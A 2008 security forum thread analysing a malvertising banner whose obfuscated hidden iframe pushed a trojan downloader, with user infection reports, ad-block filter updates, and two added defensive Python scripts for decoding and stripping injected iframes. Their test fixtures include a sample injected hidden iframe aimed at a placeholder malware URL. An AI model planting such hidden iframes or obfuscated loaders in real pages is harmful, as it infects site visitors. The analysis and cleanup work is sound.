Does anyone know anything about this advert?


nwrickert
sand groper
Premium,MVM
join:2004-09-04
Geneva, IL
·AT&T U-Verse
·AT&T Midwest

reply to nwrickert
Re: Does anyone know anything about this advert?

Here is the iframe definition near the bottom of the eskimo.com page:
Anything obfuscated that way looks suspicious to me.

The content of the iframe has "unescape('%19%04%3C9%0E%60wL0" and that percent encoding goes on for most of the JavaScript (around 23000 bytes). Clearly somebody was hiding something.

I fetched those pages with "wget", so have local copies.

I later tried loading the page in XP with firefox, scripting turned on, but a limited user account. Nothing bad happened. This probably requires IE on an admin account before it can do anything bad.

Yet another reason to use a limited user account, to use firefox, to use the noscript extension.

--
AT&T dsl; Westell 327w modem/router; SuSE 10.1; firefox 2.0.0.13


EGeezer
Go Bobcats
Premium
join:2002-08-04
Country!
Looks like the code in that line directs the user to the aforementioned website's directory: /dl/adv598.php
--
Mayors of New York come from nowhere and go nowhere.
Wallace Sayre (apparently, so do governors... )


nwrickert
sand groper
Premium,MVM
join:2004-09-04
Geneva, IL
·AT&T U-Verse
·AT&T Midwest


1 edit
Yes, it does.

I used "lynx -dump" to decode it, before I posted the target link in an earlier post in this thread. That's quicker than trying to do it manually.

I don't currently have a good tool for handling that obfuscated javascript, though.
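As an added example, not code posted in this thread: a small static decoder for the `unescape('%..')` layer described above. It implements JavaScript's `unescape()` semantics (which differ from `urllib.parse.unquote`), pulls out any URLs that appear, and reports how much of the result is printable, so that a blob like the `%19%04%3C9%0E%60wL0` sample is recognised as still-encoded rather than as finished HTML. The script text is constructed for illustration and uses a placeholder host.

```python
import re

# Matches the string literal passed to a JavaScript unescape('...') call.
UNESCAPE_CALL = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
# JavaScript unescape() sequences: %uXXXX (UTF-16 code unit) or %XX (one code point).
ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s):
    """Decode like JavaScript unescape(): %XX is a single code point (not a
    UTF-8 byte, unlike urllib.parse.unquote), %uXXXX is a UTF-16 code unit,
    and malformed escapes are left untouched."""
    return ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def printable_ratio(s):
    """Fraction of characters that are printable text (tabs/newlines allowed)."""
    if not s:
        return 0.0
    ok = sum(1 for ch in s if ch.isprintable() or ch in "\r\n\t")
    return ok / len(s)


def decode_unescape_calls(script):
    """Return [(decoded_text, printable_ratio, urls)] for every unescape()
    literal in the script. A low printable ratio means the output is not yet
    HTML/JS, i.e. another decoding layer (XOR, charCode tricks, ...) follows."""
    results = []
    for m in UNESCAPE_CALL.finditer(script):
        decoded = js_unescape(m.group(2))
        urls = re.findall(r"https?://[^\s'\"<>]+", decoded)
        results.append((decoded, printable_ratio(decoded), urls))
    return results


# Constructed sample: a one-layer iframe writer and the still-encoded blob from
# the thread. example.invalid is a placeholder host, not a real site.
SAMPLE = r"""
document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid%2Fdl%2Fadv598.php%22%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E'));
eval(unescape('%19%04%3C9%0E%60wL0'));
"""

if __name__ == "__main__":
    for text, ratio, urls in decode_unescape_calls(SAMPLE):
        print(f"printable={ratio:.2f} urls={urls} text={text!r}")
```

Run it over a saved copy of the page (for instance the one fetched with wget) to list the iframes and URLs a first decoding layer reveals without ever executing the script.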


EGeezer
Go Bobcats
Premium
join:2002-08-04
Country!
·Callcentric
·RoadRunner Cable
·AT&T CallVantage


1 edit
I also see that the adv.php page seems to have a malware warning from stopbadware.org - is that a recent development?

This site is currently (as of 04/15/2008) being reported to StopBadware by the following partners: Google: reported bad

--
Mayors of New York come from nowhere and go nowhere.
Wallace Sayre (apparently, so do governors... )


nwrickert
sand groper
Premium,MVM
join:2004-09-04
Geneva, IL
Not sure.

I checked the stopbadware.org site for www.eskimo.com/dsl/ but it isn't listed. Other parts of eskimo.com are listed, but not the one that was used here.

I'm not seeing any warning if I try reloading the original link.


rick752
Premium
join:2006-01-27
New York


1 edit
reply to justin
I just added:
*cdpuvbhfzz.com*
.. to the 'Malicious code' area of the EasyList subscription for Adblock Plus.

That took care of the current malicious 3rd-party frame there. That frame is still present on Eskimo.com.

We'll have to see how this manifests itself again in another instance to try to zero in on it.
--
EasyList, EasyElement, & ABP Tracking Filter Subscriptions for Adblock Plus


LoneWolf

join:2008-01-20
reply to justin
Another good reason to have an ad blocker.
In my case AdMuncher.
Can't click on what I can't see.


EGeezer
Go Bobcats
Premium
join:2002-08-04
Country!
·Callcentric
·RoadRunner Cable
·AT&T CallVantage

reply to nwrickert
I think I might have loaded Google's link instead - such a dummy I am!! My GET of the actual link only yielded an Apache page.
--
Mayors of New York come from nowhere and go nowhere.
Wallace Sayre (apparently, so do governors... )


Name Game
Premium
join:2002-07-07
North Myrtle Beach, SC

reply to justin
Discussions > Troubleshooting & Implementation Questions > Script appears to be running from GoogleADs
(But it is not..see here)
»groups.google.com/group/adsense-···lnk=raot

»forum.coppermine-gallery.net/ind···sg250236

see also
Malicious site? or hacked site?

traffdollars.biz/dl/adv598.php

»spywarehunt.blogspot.com/
--
Gladiator Security Forum »www.gladiator-antivirus.com/
*
A fun/friendly/informative forum for the mature elder crowd
»www.theover50goldengroup.net


rick752
Premium
join:2006-01-27
New York
Thanx, Name Game ... that was the 2nd verification that I was looking for.
Changing filter in ABP EasyList now.


Name Game
Premium
join:2002-07-07
North Myrtle Beach, SC

said by rick752:

Thanx, Name Game ... that was the 2nd verification that I was looking for.
Changing filter in ABP EasyList now.
What a nasty piece of work that stuff is.. good luck, Rick.


EGeezer
Go Bobcats
Premium
join:2002-08-04
Country!

1 edit
reply to rick752
And more here -

»www.google.com/search?q=adv598.php
Mayors of New York come from nowhere and go nowhere.
Wallace Sayre (apparently, so do governors... )


rick752
Premium
join:2006-01-27
New York

1 edit
I think I have this blocked now. Thanx.
That really sucks


Name Game
Premium
join:2002-07-07
North Myrtle Beach, SC
Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?

»forum.coppermine-gallery.net/ind···1.0.html

mysec
Premium
join:2005-11-29

reply to justin
Using the link nwrickert gives, here is the exploit in action.

As the page loads, the iframe connects in the background to cdpuvbhfzz.com (see IE status bar) and almost immediately an IE error box appears:

Meanwhile adv598.html caches:

As soon as the user clicks to close the IE error box, the IE window closes, a new IE Blank window opens and the obfuscated code attempts to download loadadv598.exe in the background:

The following file also caches, and the CLSID is one of several vulnerable ActiveX exploits used in the past, but I didn't follow through to check it more.

Conclusion

Lots of fancy footwork attempting to accomplish the same old thing: sneak in a trojan downloader, easily prevented with proper security.



TechSponge

join:2001-05-14
Hillside, NJ

reply to justin
Hey Folks! I'm the idiot that clicked on the cool looking Banner. I never click on Banners unless I'm on legit sites. Thought that was safe. Guess not.
So...got back to the city to work on this PC to get it running for tomorrow.
Info: I was running Spybot S&D fully patched and TeaTimer running. SpywareBlaster installed but not "active". Symantec Corp 10, fully patched.
It created 2 folders in PROGRAM FILES: Netproject & Helper. 3 BHOs were added according to HijackThis. 2 were pointing to ieservicegate (IE Anti-Spyware - {9034a523-d068-4be8-a284-9df278be776e} - »www.ieservicegate.com/redire{...} + Extra button: (no name) - {9034a523-d068-4be8-a284-9df278be776e} - »www.ieservicegate.com/redire{...}) and 1 to netproject (sbmdl.dll).
There were a bunch of items caught by Spybot: Zlob, Smitfraud, Spylocked, win32 renos, and a few others.
As I type this, even though I would say I've done a good job cleaning...I get a few warnings from Symantec in my temp IE content files for trojans (mediatubecodec[1].exe) and Spybot is blocking...something.
Looks like the wipe begins. Thanks to all for all of your input. All of this is above my head. I'm just a simple network guy.
-Sponge


Lanik
Lab-nik
Premium,ExMod 2002-03
join:2001-06-25
Bay Area

said by TechSponge:

Hey Folks! I'm the idiot that clicked on the cool looking Banner.
Sh!t happens, we've all made that mistake at one point or another. What's more important is how you proceed from there mainly and what lessons were learned during this exercise in patience.
--
"If it ain't broke don't fix it."


TechSponge

join:2001-05-14
Hillside, NJ
reply to justin
BTW - I never got to click on anything on the site...I had the time to visually search for NY and NJ as served areas...and the fireworks just began.


Name Game
Premium
join:2002-07-07
North Myrtle Beach, SC


1 edit
reply to justin
cure.txt 2,615 bytes
foulu
Contributor
Coppermine frequent
--------------------------------------------------------------------------------
Hi,

I made a PHP file that can sanitize the added data from PHP & HTML files that are infected with iframe things. I created it to use on one of my working sites, but I think releasing it will help more people. The script is simple: it just checks the current folder and all sub folders for .php & .html, loops to find the infected string in those files and then removes it. Anyway, use it at your own will; I will not take any responsibility if you damage your site when using it.

I attach the file to this post; download and rename it to cure.php, upload it to your site & run it.

------------------------------------------------------------
cure.txt (2.48 KB - downloaded 81 times.)

http://forum.coppermine-gallery.net/index.php/topic,51671.180.html

also there...
A little shell (/bin/sh) script to clean up that... Not better than capecodgal's one, but very simple to use if you have shell access or /bin/sh CGI capabilities.

Use it in your web root.

------------------------------------------------------------
nettoie_cpg.txt (0.37 KB - downloaded 32 times.)

--
Gladiator Security Forum http://www.gladiator-antivirus.com/
*
A fun/friendly/informative forum for the mature elder crowd
http://www.theover50goldengroup.net
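The cure.php and /bin/sh cleaners quoted above are not reproduced on this page, so here is an added example of the same approach written independently (not foulu's or capecodgal's code): walk a web root, find `<iframe>` tags whose `src` points at an operator-supplied list of hosts in .php/.html files, and strip them, keeping a .bak copy and defaulting to a dry run. The host `badhost.invalid` and the sample page are placeholders constructed for the demo.

```python
import os
import re
import shutil
from pathlib import Path


def iframe_pattern(hosts):
    """Compile a pattern for an injected <iframe> whose src points at one of
    the given hosts (operator-supplied; the ones used below are placeholders)."""
    alts = "|".join(re.escape(h) for h in hosts)
    return re.compile(
        r"<iframe\b[^>]*\bsrc\s*=\s*['\"]?\s*(?:https?:)?//(?:" + alts + r")[^>]*>"
        r"(?:\s*</iframe\s*>)?",
        re.I | re.S,
    )


def strip_injected_iframes(text, hosts):
    """Return (cleaned_text, number_of_iframes_removed)."""
    return iframe_pattern(hosts).subn("", text)


def clean_tree(root, hosts, exts=(".php", ".html", ".htm"), dry_run=True):
    """Walk root and return {relative_path: removed_count}. Files are only
    rewritten (with a .bak copy kept beside them) when dry_run is False."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = Path(dirpath, name)
            if path.suffix.lower() not in exts:
                continue
            original = path.read_text(encoding="utf-8", errors="surrogateescape")
            cleaned, n = strip_injected_iframes(original, hosts)
            if n:
                report[str(path.relative_to(root))] = n
                if not dry_run:
                    shutil.copy2(path, str(path) + ".bak")
                    path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return report


# Constructed sample: a page with one injected hidden iframe (placeholder host).
SAMPLE_PAGE = (
    '<?php include "header.php"; ?>\n'
    '<html><body><p>gallery</p></body></html>\n'
    '<iframe src="http://badhost.invalid/dl/adv598.php" width=1 height=1></iframe>\n'
)

if __name__ == "__main__":
    cleaned, removed = strip_injected_iframes(SAMPLE_PAGE, ["badhost.invalid"])
    print(removed, "iframe(s) removed")
    print(cleaned)
```

Run `clean_tree("/path/to/webroot", ["host-from-your-own-pages"])` first as a dry run to review the report, and only then with `dry_run=False`; closing the hole the injection came through (the Coppermine thread linked above) is still needed or the iframe will return.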


foxsteve
Premium
join:2001-12-28
Campbell, CA
reply to nwrickert
cdpuvbhfzz.com has address 85.255.121.195
Found 4 websites with the IP 85.255.121.195

1) aarmrgdxrv.com
2) acdedblshd.com
3) adtctqypoa.com
4) xabmiphabh.cn